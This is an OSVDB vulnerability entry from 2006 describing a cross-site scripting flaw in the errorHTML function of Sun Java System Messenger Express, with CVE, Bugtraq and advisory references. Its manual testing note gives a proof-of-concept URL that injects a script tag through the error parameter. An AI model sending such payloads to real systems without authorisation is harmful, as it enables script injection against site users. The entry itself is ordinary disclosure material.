Sun Java System Messenger Express errorHTML Function XSS

2006-10-30T10:33:48
ID OSVDB:30151
Type osvdb
Reporter OSVDB
Modified 2006-10-30T10:33:48

Description

Manual Testing Notes

https://[target]/?user=&error=%3Cscript%3Ealert('hakin9');%3C/script%3E

References:

Secunia Advisory ID: 22663
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-10/0510.html
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-01/0208.html
FrSIRT Advisory: ADV-2006-4281
CVE-2006-5653
Bugtraq ID: 20832